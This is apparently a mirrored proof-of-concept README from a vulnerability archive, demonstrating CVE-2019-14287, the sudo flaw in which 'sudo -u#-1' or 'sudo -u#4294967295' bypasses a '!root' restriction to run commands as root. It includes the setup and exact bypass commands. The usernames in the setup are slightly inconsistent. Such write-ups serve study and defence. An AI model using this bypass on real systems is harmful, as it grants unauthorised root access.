关联漏洞
介绍
# CVE-2019-14287-write-up #
4294967295
Sudo Bug Allows Restricted Users to Run Commands as Root
## DEMONSTRATION OF VULNERABILITY
### Add a new user:
sudo su - root
useradd -m -s /bin/bash testuser
passwd testuser // add password to user
visudo
### Add a new entry
test ALL=(ALL, !root) /usr/bin/id // specifying that this user cannot use id command with root user
SAVE THE FILE AND EXIT FROM ROOT USER
### LOGON TO TEST USER
sudo su - test
### Write command
sudo id
YOU WILL BE PROMPTED WITH MESSAGE Sorry, user test is not allowed to execute '/usr/bin/id' as root
### NOW WRITE COMMAND
sudo -u#-1 id
OR
sudo -u#4294967295 id
And there go, you have executed id command using root
文件快照
[4.0K] /data/pocs/d510a3a79795f05ec59895fd3676add330abdfec
└── [ 696] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →